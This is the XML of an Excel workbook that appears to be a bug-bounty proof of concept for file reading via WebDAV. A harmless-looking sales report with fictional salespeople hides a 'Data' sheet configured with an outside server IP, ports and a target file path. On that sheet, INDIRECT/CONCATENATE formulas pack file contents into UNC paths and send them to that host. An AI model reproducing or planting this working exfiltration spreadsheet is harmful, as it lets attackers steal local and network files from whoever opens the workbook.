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gregson-my.sharepoint.com/personal/jonathan_jdgregson_com/Documents/Bug Bounties/Microsoft/Excel Arbitrary File Read via WebDAV/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="2" documentId="13_ncr:1_{11EADCCE-CA3B-415D-9E38-64A214714C66}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{BE20C4EE-EC65-4809-ABEE-9C96ACE7CDFC}"/>
  <bookViews>
    <workbookView xWindow="1470" yWindow="1522" windowWidth="21713" windowHeight="10831" activeTab="1" xr2:uid="{DB1EFC37-21AF-4132-8D6F-7F45F45F8E30}"/>
  </bookViews>
  <sheets>
    <sheet name="Report" sheetId="2" r:id="rId1"/>
    <sheet name="Data" sheetId="1" r:id="rId2"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId3"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">Report!$A$1:$F$1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  <c r="I14" i="1" s="1"/>
  <c r="F9" i="2"/>
  <c r="D9" i="2"/>
  <c r="C9" i="2"/>
  <c r="B9" i="2"/>
  <c r="F3" i="2"/>
  <c r="F4" i="2"/>
  <c r="F5" i="2"/>
  <c r="F6" i="2"/>
  <c r="F7" i="2"/>
  <c r="F8" i="2"/>
  <c r="F2" i="2"/>
  <c r="D3" i="2"/>
  <c r="D4" i="2"/>
  <c r="D5" i="2"/>
  <c r="D6" i="2"/>
  <c r="D7" i="2"/>
  <c r="D8" i="2"/>
  <c r="D2" i="2"/>
  <c r="J14" i="1"/>
  <c r="I62" i="1" l="1"/>
  <c r="I46" i="1"/>
  <c r="I30" i="1"/>
  <c r="I55" i="1"/>
  <c r="I37" i="1"/>
  <c r="I49" i="1"/>
  <c r="I61" i="1"/>
  <c r="I45" i="1"/>
  <c r="I29" i="1"/>
  <c r="I53" i="1"/>
  <c r="I35" i="1"/>
  <c r="I60" i="1"/>
  <c r="I44" i="1"/>
  <c r="I28" i="1"/>
  <c r="I38" i="1"/>
  <c r="I51" i="1"/>
  <c r="I59" i="1"/>
  <c r="I43" i="1"/>
  <c r="I27" i="1"/>
  <c r="I39" i="1"/>
  <c r="I52" i="1"/>
  <c r="I58" i="1"/>
  <c r="I42" i="1"/>
  <c r="I26" i="1"/>
  <c r="I23" i="1"/>
  <c r="I36" i="1"/>
  <c r="I57" i="1"/>
  <c r="I41" i="1"/>
  <c r="I25" i="1"/>
  <c r="I20" i="1"/>
  <c r="I56" i="1"/>
  <c r="I40" i="1"/>
  <c r="I24" i="1"/>
  <c r="I22" i="1"/>
  <c r="I19" i="1"/>
  <c r="I50" i="1"/>
  <c r="I34" i="1"/>
  <c r="I18" i="1"/>
  <c r="I33" i="1"/>
  <c r="I17" i="1"/>
  <c r="I54" i="1"/>
  <c r="I48" i="1"/>
  <c r="I32" i="1"/>
  <c r="I16" i="1"/>
  <c r="I21" i="1"/>
  <c r="I63" i="1"/>
  <c r="I47" i="1"/>
  <c r="I31" i="1"/>
  <c r="I15" i="1"/>
  <c r="J19" i="1"/>
  <c r="J33" i="1"/>
  <c r="J28" i="1"/>
  <c r="J25" i="1"/>
  <c r="J30" i="1"/>
  <c r="J20" i="1"/>
  <c r="J27" i="1"/>
  <c r="J15" i="1"/>
  <c r="J39" i="1"/>
  <c r="J54" i="1"/>
  <c r="J42" i="1"/>
  <c r="J55" i="1"/>
  <c r="J24" i="1"/>
  <c r="J21" i="1"/>
  <c r="J40" i="1"/>
  <c r="J44" i="1"/>
  <c r="J41" i="1"/>
  <c r="J37" i="1"/>
  <c r="J60" i="1"/>
  <c r="J31" i="1"/>
  <c r="J45" i="1"/>
  <c r="J36" i="1"/>
  <c r="J59" i="1"/>
  <c r="J35" i="1"/>
  <c r="J51" i="1"/>
  <c r="J62" i="1"/>
  <c r="J29" i="1"/>
  <c r="J18" i="1"/>
  <c r="J32" i="1"/>
  <c r="J61" i="1"/>
  <c r="J16" i="1"/>
  <c r="J50" i="1"/>
  <c r="J63" i="1"/>
  <c r="J22" i="1"/>
  <c r="J47" i="1"/>
  <c r="J43" i="1"/>
  <c r="J48" i="1"/>
  <c r="J57" i="1"/>
  <c r="J26" i="1"/>
  <c r="J58" i="1"/>
  <c r="J53" i="1"/>
  <c r="J56" i="1"/>
  <c r="J34" i="1"/>
  <c r="J52" i="1"/>
  <c r="J49" i="1"/>
  <c r="J17" i="1"/>
  <c r="J38" i="1"/>
  <c r="J23" i="1"/>
  <c r="J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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="42" uniqueCount="37">
  <si>
    <t>Virginia Potts</t>
  </si>
  <si>
    <t>Product total</t>
  </si>
  <si>
    <t>Service total</t>
  </si>
  <si>
    <t>Total</t>
  </si>
  <si>
    <t>Goal</t>
  </si>
  <si>
    <t>Daisy Johnson</t>
  </si>
  <si>
    <t>Bruce Banner</t>
  </si>
  <si>
    <t>James Rhodes</t>
  </si>
  <si>
    <t>Natasha Romanoff</t>
  </si>
  <si>
    <t>Peter Parker</t>
  </si>
  <si>
    <t>Sam Wilson</t>
  </si>
  <si>
    <t>Goal %</t>
  </si>
  <si>
    <t>TOTAL</t>
  </si>
  <si>
    <t>Config name</t>
  </si>
  <si>
    <t>Value</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>V</t>
  </si>
  <si>
    <t>|</t>
  </si>
  <si>
    <t xml:space="preserve"> /</t>
  </si>
  <si>
    <t>Cell Separator</t>
  </si>
  <si>
    <t>Salesperson</t>
  </si>
  <si>
    <t>Exfil Port Range Start</t>
  </si>
  <si>
    <t>Starting port to use. Each line will be exfiltrated to a starting port + i.</t>
  </si>
  <si>
    <t>String or character used to separate cells when the data is transmitted. You may need to change this if the target data uses the same string internally.</t>
  </si>
  <si>
    <t>These cells exfiltrate the data. You shouldn't need to modify or move them if you only want to exfiltrate the first 50 cells from the first 4 colums.</t>
  </si>
  <si>
    <t>35.80.180.162</t>
  </si>
  <si>
    <t>Exfil Data</t>
  </si>
  <si>
    <t xml:space="preserve">               . -------</t>
  </si>
  <si>
    <t>Exfil Row</t>
  </si>
  <si>
    <t>\</t>
  </si>
  <si>
    <t xml:space="preserve"> V</t>
  </si>
  <si>
    <t xml:space="preserve"> |</t>
  </si>
  <si>
    <t xml:space="preserve"> ---  .</t>
  </si>
  <si>
    <t>files over the network, or local files with UNC paths like \\localhost\C$\Users…</t>
  </si>
  <si>
    <t>Change this to point to the file that you want to exfiltrate data from. By default this will select the first 50 cells from the first 4 colums. You can use UNC paths to access</t>
  </si>
  <si>
    <t>Exfil Server Address</t>
  </si>
  <si>
    <t>Server the exfiltrated data will be sent to via path paramaters in WebDAV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</si>
</sst>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1">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" quotePrefix="1"/>
    <xf numFmtId="3" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="3" xfId="3"/>
    <xf numFmtId="3" fontId="3" fillId="0" borderId="3" xfId="3" applyNumberFormat="1"/>
    <xf numFmtId="2" fontId="3" fillId="0" borderId="3" xfId="3" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="2"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf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Report!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Product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Report!$A$2:$A$8</c:f>
              <c:strCache>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>Daisy Johnson</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Bruce Banner</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>James Rhodes</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Natasha Romanoff</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Peter Parker</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Sam Wilson</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Virginia Potts</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Report!$B$2:$B$8</c:f>
              <c:numCache>
                <c:formatCode>#,##0</c:formatCode>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>15898</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>32244</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>56321</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>10100</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>5450</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>24889</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>78664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4-4FDD-A940-551028E12459}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Report!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Service 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Report!$A$2:$A$8</c:f>
              <c:strCache>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>Daisy Johnson</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Bruce Banner</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>James Rhodes</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Natasha Romanoff</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Peter Parker</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Sam Wilson</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Virginia Potts</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Report!$C$2:$C$8</c:f>
              <c:numCache>
                <c:formatCode>#,##0</c:formatCode>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>45000</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>23900</c:v>
                </c:pt>
                <c:pt idx="2" formatCode="General">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>109883</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>123443</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>23421</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>65567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4-4FDD-A940-551028E1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1168015"/>
        <c:axId val="1111170511"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="111116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170511"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="11111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16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14</xdr:col>
      <xdr:colOff>42862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73083-7EA4-8DCE-4F3C-D07F8C665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nathanGregson/OneDrive%20-%20jdgregson/Documents/Employees/sala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B579-8640-4325-9B7D-4228EE1862F0}">
  <dimension ref="A1:F10"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.25" x14ac:dyDescent="0.45"/>
  <cols>
    <col min="1" max="1" width="16.3984375" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="17.73046875" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="17" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="8.796875" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="8.19921875" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="10.73046875" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="19.899999999999999" thickBot="1" x14ac:dyDescent="0.65">
      <c r="A1" s="4" t="s">
        <v>20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ht="14.65" thickTop="1" x14ac:dyDescent="0.45">
      <c r="A2" t="s">
        <v>5</v>
      </c>
      <c r="B2" s="2">
        <v>15898</v>
      </c>
      <c r="C2" s="2">
        <v>45000</v>
      </c>
      <c r="D2" s="2">
        <f>SUM(B2:C2)</f>
        <v>60898</v>
      </c>
      <c r="E2" s="2">
        <v>75000</v>
      </c>
      <c r="F2" s="3">
        <f>D2/E2*100</f>
        <v>81.197333333333333</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A3" t="s">
        <v>6</v>
      </c>
      <c r="B3" s="2">
        <v>32244</v>
      </c>
      <c r="C3" s="2">
        <v>23900</v>
      </c>
      <c r="D3" s="2">
        <f t="shared" ref="D3:D8" si="0">SUM(B3:C3)</f>
        <v>56144</v>
      </c>
      <c r="E3" s="2">
        <v>50000</v>
      </c>
      <c r="F3" s="3">
        <f t="shared" ref="F3:F9" si="1">D3/E3*100</f>
        <v>112.28800000000001</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A4" t="s">
        <v>7</v>
      </c>
      <c r="B4" s="2">
        <v>56321</v>
      </c>
      <c r="C4">
        <v>0</v>
      </c>
      <c r="D4" s="2">
        <f t="shared" si="0"/>
        <v>56321</v>
      </c>
      <c r="E4" s="2">
        <v>30000</v>
      </c>
      <c r="F4" s="3">
        <f t="shared" si="1"/>
        <v>187.73666666666665</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A5" t="s">
        <v>8</v>
      </c>
      <c r="B5" s="2">
        <v>10100</v>
      </c>
      <c r="C5" s="2">
        <v>109883</v>
      </c>
      <c r="D5" s="2">
        <f t="shared" si="0"/>
        <v>119983</v>
      </c>
      <c r="E5" s="2">
        <v>110000</v>
      </c>
      <c r="F5" s="3">
        <f t="shared" si="1"/>
        <v>109.07545454545455</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A6" t="s">
        <v>9</v>
      </c>
      <c r="B6" s="2">
        <v>5450</v>
      </c>
      <c r="C6" s="2">
        <v>123443</v>
      </c>
      <c r="D6" s="2">
        <f t="shared" si="0"/>
        <v>128893</v>
      </c>
      <c r="E6" s="2">
        <v>90000</v>
      </c>
      <c r="F6" s="3">
        <f t="shared" si="1"/>
        <v>143.21444444444444</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A7" t="s">
        <v>10</v>
      </c>
      <c r="B7" s="2">
        <v>24889</v>
      </c>
      <c r="C7" s="2">
        <v>23421</v>
      </c>
      <c r="D7" s="2">
        <f t="shared" si="0"/>
        <v>48310</v>
      </c>
      <c r="E7" s="2">
        <v>34000</v>
      </c>
      <c r="F7" s="3">
        <f t="shared" si="1"/>
        <v>142.08823529411765</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A8" t="s">
        <v>0</v>
      </c>
      <c r="B8" s="2">
        <v>78664</v>
      </c>
      <c r="C8" s="2">
        <v>65567</v>
      </c>
      <c r="D8" s="2">
        <f t="shared" si="0"/>
        <v>144231</v>
      </c>
      <c r="E8" s="2">
        <v>120000</v>
      </c>
      <c r="F8" s="3">
        <f t="shared" si="1"/>
        <v>120.1925</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="14.65" thickBot="1" x14ac:dyDescent="0.5">
      <c r="A9" s="5" t="s">
        <v>12</v>
      </c>
      <c r="B9" s="6">
        <f>SUM(B2:B8)</f>
        <v>223566</v>
      </c>
      <c r="C9" s="6">
        <f>SUM(C2:C8)</f>
        <v>391214</v>
      </c>
      <c r="D9" s="6">
        <f>SUM(B9:C9)</f>
        <v>614780</v>
      </c>
      <c r="E9" s="6">
        <v>550000</v>
      </c>
      <c r="F9" s="7">
        <f t="shared" si="1"/>
        <v>111.77818181818182</v>
      </c>
    </row>
    <row r="10" spans="1:6" ht="14.65" thickTop="1" x14ac:dyDescent="0.45"/>
  </sheetData>
  <autoFilter ref="A1:F1" xr:uid="{3C0EB579-8640-4325-9B7D-4228EE1862F0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9A0E-79E5-49EE-B2F4-FB7B690141DA}">
  <dimension ref="A1:J64"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="J14" sqref="J14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.25" x14ac:dyDescent="0.45"/>
  <cols>
    <col min="1" max="1" width="18" customWidth="1"/>
    <col min="2" max="2" width="16.33203125" customWidth="1"/>
    <col min="3" max="3" width="25.59765625" customWidth="1"/>
    <col min="4" max="4" width="28.33203125" customWidth="1"/>
    <col min="8" max="8" width="9.46484375" customWidth="1"/>
    <col min="9" max="9" width="24.796875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="14.65" thickBot="1" x14ac:dyDescent="0.5">
      <c r="A1" s="8" t="s">
        <v>13</v>
      </c>
      <c r="B1" s="9" t="s">
        <v>14</v>
      </c>
      <c r="C1" s="8" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="2" spans="1:10" ht="15" thickTop="1" thickBot="1" x14ac:dyDescent="0.5">
      <c r="A2" t="s">
        <v>35</v>
      </c>
      <c r="B2" s="30" t="s">
        <v>25</v>
      </c>
      <c r="C2" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="3" spans="1:10" ht="15" thickTop="1" thickBot="1" x14ac:dyDescent="0.5">
      <c r="A3" t="s">
        <v>21</v>
      </c>
      <c r="B3" s="30">
        <v>40000</v>
      </c>
      <c r="C3" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="4" spans="1:10" ht="15" thickTop="1" thickBot="1" x14ac:dyDescent="0.5">
      <c r="A4" t="s">
        <v>19</v>
      </c>
      <c r="B4" s="30" t="s">
        <v>17</v>
      </c>
      <c r="C4" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="5" spans="1:10" ht="14.65" thickTop="1" x14ac:dyDescent="0.45"/>
    <row r="6" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A6" s="12" t="s">
        <v>27</v>
      </c>
      <c r="B6" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="7" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A7" s="12" t="s">
        <v>18</v>
      </c>
      <c r="B7" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="8" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A8" s="12" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="9" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A9" s="12" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="10" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A10" s="12" t="s">
        <v>17</v>
      </c>
      <c r="C10" s="10" t="s">
        <v>24</v>
      </c>
      <c r="J10" s="13" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="11" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A11" s="12" t="s">
        <v>17</v>
      </c>
      <c r="J11" s="12" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="12" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A12" s="12" t="s">
        <v>17</v>
      </c>
      <c r="J12" s="12" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="13" spans="1:10" ht="14.65" thickBot="1" x14ac:dyDescent="0.5">
      <c r="A13" s="12" t="s">
        <v>16</v>
      </c>
      <c r="D13" s="1"/>
      <c r="H13" s="22" t="s">
        <v>28</v>
      </c>
      <c r="I13" s="22" t="s">
        <v>26</v>
      </c>
      <c r="J13" s="23" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="14" spans="1:10" ht="15" thickTop="1" thickBot="1" x14ac:dyDescent="0.5">
      <c r="A14" s="30" cm="1">
        <f t="array" ref="A14:D63">[1]Sheet1!A1:D50</f>
        <v>0</v>
      </c>
      <c r="B14" s="14">
        <v>0</v>
      </c>
      <c r="C14" s="14">
        <v>0</v>
      </c>
      <c r="D14" s="15">
        <v>0</v>
      </c>
      <c r="H14" s="24">
        <v>1</v>
      </c>
      <c r="I14" s="25" t="str">
        <f>_xlfn.TEXTJOIN($B$4,FALSE,H14,A14:D14)</f>
        <v>1|0|0|0|0</v>
      </c>
      <c r="J14" s="26" t="e">
        <f ca="1">VLOOKUP(A1, INDIRECT(CONCATENATE("'\\",$B$2,"@",$B$3+(H14-1),"\[",I14,"]Sheet1'!A1:A1")), 2, TRUE)</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="15" spans="1:10" ht="14.65" thickTop="1" x14ac:dyDescent="0.45">
      <c r="A15" s="16">
        <v>0</v>
      </c>
      <c r="B15">
        <v>0</v>
      </c>
      <c r="C15">
        <v>0</v>
      </c>
      <c r="D15" s="17">
        <v>0</v>
      </c>
      <c r="H15" s="11">
        <v>2</v>
      </c>
      <c r="I15" t="str">
        <f t="shared" ref="I15:I63" si="0">_xlfn.TEXTJOIN($B$4,FALSE,H15,A15:D15)</f>
        <v>2|0|0|0|0</v>
      </c>
      <c r="J15" s="27" t="e">
        <f t="shared" ref="J15:J63" ca="1" si="1">VLOOKUP(A2, INDIRECT(CONCATENATE("'\\",$B$2,"@",$B$3+(H15-1),"\[",I15,"]Sheet1'!A1:A1")), 2, TRUE)</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="16" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A16" s="16">
        <v>0</v>
      </c>
      <c r="B16">
        <v>0</v>
      </c>
      <c r="C16">
        <v>0</v>
      </c>
      <c r="D16" s="18">
        <v>0</v>
      </c>
      <c r="H16" s="11">
        <v>3</v>
      </c>
      <c r="I16" t="str">
        <f t="shared" si="0"/>
        <v>3|0|0|0|0</v>
      </c>
      <c r="J16" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="17" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A17" s="16">
        <v>0</v>
      </c>
      <c r="B17">
        <v>0</v>
      </c>
      <c r="C17">
        <v>0</v>
      </c>
      <c r="D17" s="18">
        <v>0</v>
      </c>
      <c r="H17" s="11">
        <v>4</v>
      </c>
      <c r="I17" t="str">
        <f t="shared" si="0"/>
        <v>4|0|0|0|0</v>
      </c>
      <c r="J17" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="18" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A18" s="16">
        <v>0</v>
      </c>
      <c r="B18">
        <v>0</v>
      </c>
      <c r="C18">
        <v>0</v>
      </c>
      <c r="D18" s="18">
        <v>0</v>
      </c>
      <c r="H18" s="11">
        <v>5</v>
      </c>
      <c r="I18" t="str">
        <f t="shared" si="0"/>
        <v>5|0|0|0|0</v>
      </c>
      <c r="J18" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="19" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A19" s="16">
        <v>0</v>
      </c>
      <c r="B19">
        <v>0</v>
      </c>
      <c r="C19">
        <v>0</v>
      </c>
      <c r="D19" s="18">
        <v>0</v>
      </c>
      <c r="H19" s="11">
        <v>6</v>
      </c>
      <c r="I19" t="str">
        <f t="shared" si="0"/>
        <v>6|0|0|0|0</v>
      </c>
      <c r="J19" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="20" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A20" s="16">
        <v>0</v>
      </c>
      <c r="B20">
        <v>0</v>
      </c>
      <c r="C20">
        <v>0</v>
      </c>
      <c r="D20" s="18">
        <v>0</v>
      </c>
      <c r="H20" s="11">
        <v>7</v>
      </c>
      <c r="I20" t="str">
        <f t="shared" si="0"/>
        <v>7|0|0|0|0</v>
      </c>
      <c r="J20" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="21" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A21" s="16">
        <v>0</v>
      </c>
      <c r="B21">
        <v>0</v>
      </c>
      <c r="C21">
        <v>0</v>
      </c>
      <c r="D21" s="18">
        <v>0</v>
      </c>
      <c r="H21" s="11">
        <v>8</v>
      </c>
      <c r="I21" t="str">
        <f t="shared" si="0"/>
        <v>8|0|0|0|0</v>
      </c>
      <c r="J21" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="22" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A22" s="16">
        <v>0</v>
      </c>
      <c r="B22">
        <v>0</v>
      </c>
      <c r="C22">
        <v>0</v>
      </c>
      <c r="D22" s="18">
        <v>0</v>
      </c>
      <c r="H22" s="11">
        <v>9</v>
      </c>
      <c r="I22" t="str">
        <f t="shared" si="0"/>
        <v>9|0|0|0|0</v>
      </c>
      <c r="J22" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="23" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A23" s="16">
        <v>0</v>
      </c>
      <c r="B23">
        <v>0</v>
      </c>
      <c r="C23">
        <v>0</v>
      </c>
      <c r="D23" s="18">
        <v>0</v>
      </c>
      <c r="H23" s="11">
        <v>10</v>
      </c>
      <c r="I23" t="str">
        <f t="shared" si="0"/>
        <v>10|0|0|0|0</v>
      </c>
      <c r="J23" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="24" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A24" s="16">
        <v>0</v>
      </c>
      <c r="B24">
        <v>0</v>
      </c>
      <c r="C24">
        <v>0</v>
      </c>
      <c r="D24" s="18">
        <v>0</v>
      </c>
      <c r="H24" s="11">
        <v>11</v>
      </c>
      <c r="I24" t="str">
        <f t="shared" si="0"/>
        <v>11|0|0|0|0</v>
      </c>
      <c r="J24" s="27" t="e">
        <f ca="1">VLOOKUP(A11, INDIRECT(CONCATENATE("'\\",$B$2,"@",$B$3+(H24-1),"\[",I24,"]Sheet1'!A1:A1")), 2, TRUE)</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="25" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A25" s="16">
        <v>0</v>
      </c>
      <c r="B25">
        <v>0</v>
      </c>
      <c r="C25">
        <v>0</v>
      </c>
      <c r="D25" s="18">
        <v>0</v>
      </c>
      <c r="H25" s="11">
        <v>12</v>
      </c>
      <c r="I25" t="str">
        <f t="shared" si="0"/>
        <v>12|0|0|0|0</v>
      </c>
      <c r="J25" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="26" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A26" s="16">
        <v>0</v>
      </c>
      <c r="B26">
        <v>0</v>
      </c>
      <c r="C26">
        <v>0</v>
      </c>
      <c r="D26" s="18">
        <v>0</v>
      </c>
      <c r="H26" s="11">
        <v>13</v>
      </c>
      <c r="I26" t="str">
        <f t="shared" si="0"/>
        <v>13|0|0|0|0</v>
      </c>
      <c r="J26" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="27" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A27" s="16">
        <v>0</v>
      </c>
      <c r="B27">
        <v>0</v>
      </c>
      <c r="C27">
        <v>0</v>
      </c>
      <c r="D27" s="18">
        <v>0</v>
      </c>
      <c r="H27" s="11">
        <v>14</v>
      </c>
      <c r="I27" t="str">
        <f t="shared" si="0"/>
        <v>14|0|0|0|0</v>
      </c>
      <c r="J27" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="28" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A28" s="16">
        <v>0</v>
      </c>
      <c r="B28">
        <v>0</v>
      </c>
      <c r="C28">
        <v>0</v>
      </c>
      <c r="D28" s="18">
        <v>0</v>
      </c>
      <c r="H28" s="11">
        <v>15</v>
      </c>
      <c r="I28" t="str">
        <f t="shared" si="0"/>
        <v>15|0|0|0|0</v>
      </c>
      <c r="J28" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="29" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A29" s="16">
        <v>0</v>
      </c>
      <c r="B29">
        <v>0</v>
      </c>
      <c r="C29">
        <v>0</v>
      </c>
      <c r="D29" s="18">
        <v>0</v>
      </c>
      <c r="H29" s="11">
        <v>16</v>
      </c>
      <c r="I29" t="str">
        <f t="shared" si="0"/>
        <v>16|0|0|0|0</v>
      </c>
      <c r="J29" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="30" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A30" s="16">
        <v>0</v>
      </c>
      <c r="B30">
        <v>0</v>
      </c>
      <c r="C30">
        <v>0</v>
      </c>
      <c r="D30" s="18">
        <v>0</v>
      </c>
      <c r="H30" s="11">
        <v>17</v>
      </c>
      <c r="I30" t="str">
        <f t="shared" si="0"/>
        <v>17|0|0|0|0</v>
      </c>
      <c r="J30" s="27" t="e">
        <f t="shared" ca="1" si="1"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="31" spans="1:10" x14ac:dyDescent="0.45">
      <c r="A31" s="16">
